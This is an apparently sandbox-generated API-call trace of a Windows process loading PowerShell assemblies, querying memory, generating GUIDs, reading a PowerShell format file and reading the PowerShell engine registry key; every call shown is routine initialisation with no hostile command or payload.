	[0318.569] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0318.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0318.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0318.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0318.882] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0318.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0318.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0318.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x1cc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0319.283] VirtualQuery (in: lpAddress=0x1cbd40, lpBuffer=0x1ccc00, dwLength=0x30 | out: lpBuffer=0x1ccc00*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.284] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc218afe7, Data2=0xa2d6, Data3=0x4178, Data4=([0]=0xbc, [1]=0x17, [2]=0xe5, [3]=0xa7, [4]=0x5d, [5]=0x8d, [6]=0xca, [7]=0xa1))) returned 0x0
	[0319.284] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb2df05ed, Data2=0xe0bb, Data3=0x4085, Data4=([0]=0x8b, [1]=0xde, [2]=0xad, [3]=0x87, [4]=0x2a, [5]=0xae, [6]=0xef, [7]=0xbf))) returned 0x0
	[0319.284] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.285] VirtualQuery (in: lpAddress=0x1cbef0, lpBuffer=0x1ccdb0, dwLength=0x30 | out: lpBuffer=0x1ccdb0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.285] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb0994fdb, Data2=0xdde4, Data3=0x4be1, Data4=([0]=0x9a, [1]=0xb8, [2]=0x1d, [3]=0x4a, [4]=0x2b, [5]=0x44, [6]=0x1e, [7]=0x3a))) returned 0x0
	[0319.286] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb5a671a3, Data2=0x851e, Data3=0x44f8, Data4=([0]=0xb5, [1]=0x6, [2]=0xd5, [3]=0xd7, [4]=0xda, [5]=0x66, [6]=0x49, [7]=0xb0))) returned 0x0
	[0319.286] VirtualQuery (in: lpAddress=0x1cc140, lpBuffer=0x1cd000, dwLength=0x30 | out: lpBuffer=0x1cd000*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.286] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.286] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.286] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xb1d1620e, Data2=0xce8, Data3=0x40bb, Data4=([0]=0x9c, [1]=0x39, [2]=0x44, [3]=0x3f, [4]=0xe5, [5]=0x39, [6]=0xfd, [7]=0xb5))) returned 0x0
	[0319.287] VirtualQuery (in: lpAddress=0x1cc140, lpBuffer=0x1cd000, dwLength=0x30 | out: lpBuffer=0x1cd000*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.287] VirtualQuery (in: lpAddress=0x1cbf60, lpBuffer=0x1cce20, dwLength=0x30 | out: lpBuffer=0x1cce20*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.287] VirtualQuery (in: lpAddress=0x1cb7b0, lpBuffer=0x1cc670, dwLength=0x30 | out: lpBuffer=0x1cc670*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.287] VirtualQuery (in: lpAddress=0x1cb7b0, lpBuffer=0x1cc670, dwLength=0x30 | out: lpBuffer=0x1cc670*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.287] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa7ccca49, Data2=0x1635, Data3=0x43fc, Data4=([0]=0xb7, [1]=0xba, [2]=0xd6, [3]=0x43, [4]=0x9a, [5]=0xa2, [6]=0xfb, [7]=0xcd))) returned 0x0
	[0319.288] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8dc0a7f8, Data2=0x62b4, Data3=0x4a1b, Data4=([0]=0x8b, [1]=0x56, [2]=0xd1, [3]=0x94, [4]=0x5d, [5]=0x7d, [6]=0xcd, [7]=0x4e))) returned 0x0
	[0319.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccc90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0319.663] SetErrorMode (uMode=0x1) returned 0x1
	[0319.663] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0319.664] GetFileType (hFile=0x304) returned 0x1
	[0319.664] SetErrorMode (uMode=0x1) returned 0x1
	[0319.664] GetFileType (hFile=0x304) returned 0x1
	[0319.664] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.665] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.666] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.666] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.667] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.667] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.667] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.667] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.668] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.668] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.669] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.669] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.669] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.669] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.670] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.670] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.671] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x1000, lpOverlapped=0x0) returned 1
	[0319.671] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0xbce, lpOverlapped=0x0) returned 1
	[0319.672] ReadFile (in: hFile=0x304, lpBuffer=0x3483c4e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3483c4e*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0319.672] ReadFile (in: hFile=0x304, lpBuffer=0x3484518, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd218, lpOverlapped=0x0 | out: lpBuffer=0x3484518*, lpNumberOfBytesRead=0x1cd218*=0x0, lpOverlapped=0x0) returned 1
	[0319.672] CloseHandle (hObject=0x304) returned 1
	[0319.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0319.672] SetErrorMode (uMode=0x1) returned 0x1
	[0319.672] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd1c0 | out: lpFileInformation=0x1cd1c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0319.672] SetErrorMode (uMode=0x1) returned 0x1
	[0319.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0319.673] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd2a8 | out: phkResult=0x1cd2a8*=0x304) returned 0x0
	[0319.673] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd22c, lpData=0x0, lpcbData=0x1cd228*=0x0 | out: lpType=0x1cd22c*=0x1, lpData=0x0, lpcbData=0x1cd228*=0x56) returned 0x0
	[0319.673] CoTaskMemAlloc (cb=0x5a) returned 0x1b409970
	[0319.673] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1fc, lpData=0x1b409970, lpcbData=0x1cd1f8*=0x56 | out: lpType=0x1cd1fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd1f8*=0x56) returned 0x0
	[0319.673] CoTaskMemFree (pv=0x1b409970) 
	[0319.673] RegCloseKey (hKey=0x304) returned 0x0
	[0319.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0319.673] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0319.691] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4d6b58f, Data2=0x1b41, Data3=0x478d, Data4=([0]=0x9c, [1]=0xa5, [2]=0xad, [3]=0x33, [4]=0x15, [5]=0x47, [6]=0x8f, [7]=0x5e))) returned 0x0
	[0319.692] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa99a61d6, Data2=0x76e0, Data3=0x4502, Data4=([0]=0xb7, [1]=0x22, [2]=0xc8, [3]=0xc2, [4]=0x4a, [5]=0x73, [6]=0xdc, [7]=0x95))) returned 0x0
	[0319.693] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa04ba2ee, Data2=0xe9c9, Data3=0x4d1e, Data4=([0]=0x82, [1]=0x9f, [2]=0x5e, [3]=0x93, [4]=0x32, [5]=0xe0, [6]=0xef, [7]=0x7))) returned 0x0
	[0319.693] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xea59ca84, Data2=0xda78, Data3=0x497c, Data4=([0]=0x9e, [1]=0xe4, [2]=0x1f, [3]=0x57, [4]=0x36, [5]=0x5e, [6]=0xdf, [7]=0x24))) returned 0x0
	[0319.694] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1171bdc4, Data2=0xb06a, Data3=0x4608, Data4=([0]=0xbf, [1]=0xb0, [2]=0xc8, [3]=0x31, [4]=0x77, [5]=0xd8, [6]=0x95, [7]=0xca))) returned 0x0
	[0319.694] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x8b3ac967, Data2=0x45e2, Data3=0x4f15, Data4=([0]=0x9c, [1]=0xf6, [2]=0x72, [3]=0xd1, [4]=0xf3, [5]=0xf4, [6]=0x18, [7]=0x4c))) returned 0x0
	[0319.695] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.696] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x4f881fe7, Data2=0x703d, Data3=0x4ef9, Data4=([0]=0xab, [1]=0xe3, [2]=0x29, [3]=0xa6, [4]=0x77, [5]=0xb0, [6]=0x82, [7]=0x5))) returned 0x0
	[0319.696] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.698] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.699] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xddfa00be, Data2=0x71b4, Data3=0x4d72, Data4=([0]=0xb4, [1]=0x57, [2]=0xe3, [3]=0x80, [4]=0x2b, [5]=0xfe, [6]=0x72, [7]=0x11))) returned 0x0
	[0319.699] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xfa6d055b, Data2=0x9df8, Data3=0x48c8, Data4=([0]=0x96, [1]=0xf8, [2]=0xfc, [3]=0xc7, [4]=0xfe, [5]=0x49, [6]=0xd7, [7]=0x39))) returned 0x0
	[0319.699] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1eb6235, Data2=0xba6d, Data3=0x4739, Data4=([0]=0xb7, [1]=0x67, [2]=0x78, [3]=0x4e, [4]=0x2f, [5]=0x30, [6]=0xac, [7]=0xfa))) returned 0x0
	[0319.699] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x3c78381d, Data2=0x172b, Data3=0x4f10, Data4=([0]=0xa9, [1]=0x84, [2]=0xc3, [3]=0x2, [4]=0x7e, [5]=0x3c, [6]=0x79, [7]=0x1b))) returned 0x0
	[0319.700] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.700] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x2a669f75, Data2=0x90c0, Data3=0x46a2, Data4=([0]=0xa9, [1]=0xb, [2]=0x75, [3]=0x76, [4]=0x25, [5]=0x95, [6]=0x4e, [7]=0x44))) returned 0x0
	[0319.700] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.700] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.700] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.701] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.701] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.701] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xa8313706, Data2=0x31c, Data3=0x4a9b, Data4=([0]=0x8d, [1]=0x5b, [2]=0xbb, [3]=0xe0, [4]=0x20, [5]=0x12, [6]=0xc5, [7]=0x38))) returned 0x0
	[0319.701] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x3beb15, Data2=0x8f7c, Data3=0x431a, Data4=([0]=0xb3, [1]=0x20, [2]=0xbe, [3]=0x19, [4]=0x3e, [5]=0xe0, [6]=0x38, [7]=0xa6))) returned 0x0
	[0319.702] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1ec9326f, Data2=0x4262, Data3=0x455a, Data4=([0]=0x83, [1]=0x58, [2]=0x92, [3]=0x31, [4]=0x86, [5]=0x3a, [6]=0x92, [7]=0x33))) returned 0x0
	[0319.702] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xf7b0f445, Data2=0x8f0b, Data3=0x46ad, Data4=([0]=0x88, [1]=0xba, [2]=0xed, [3]=0x72, [4]=0xe3, [5]=0xf, [6]=0xa3, [7]=0x31))) returned 0x0
	[0319.702] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xfe2ec3bc, Data2=0x5250, Data3=0x4a78, Data4=([0]=0x81, [1]=0x2d, [2]=0x7, [3]=0xd4, [4]=0x13, [5]=0xc9, [6]=0xee, [7]=0x14))) returned 0x0
	[0319.702] VirtualQuery (in: lpAddress=0x1cc140, lpBuffer=0x1cd000, dwLength=0x30 | out: lpBuffer=0x1cd000*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0319.703] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xad24eb8a, Data2=0xfce3, Data3=0x47e5, Data4=([0]=0x8a, [1]=0xb3, [2]=0xad, [3]=0x55, [4]=0xf3, [5]=0x68, [6]=0xc3, [7]=0x7c))) returned 0x0
	[0319.703] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xd4903844, Data2=0x709d, Data3=0x43a6, Data4=([0]=0xb1, [1]=0x65, [2]=0x73, [3]=0x7d, [4]=0x7b, [5]=0x5a, [6]=0x2e, [7]=0xc0))) returned 0x0
	[0319.703] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0x1903cc7a, Data2=0xd154, Data3=0x4a1e, Data4=([0]=0x95, [1]=0x1a, [2]=0x9e, [3]=0xac, [4]=0x5d, [5]=0xd, [6]=0xbc, [7]=0x15))) returned 0x0
	[0319.703] CoCreateGuid (in: pguid=0x1cd4d0 | out: pguid=0x1cd4d0*(Data1=0xc8373021, Data2=0x3053, Data3=0x463a, Data4=([0]=0xb7, [1]=0x59, [2]=0xcc, [3]=0x73, [4]=0x12, [5]=0x80, [6]=0x7d, [7]=0x46))) returned 0x0
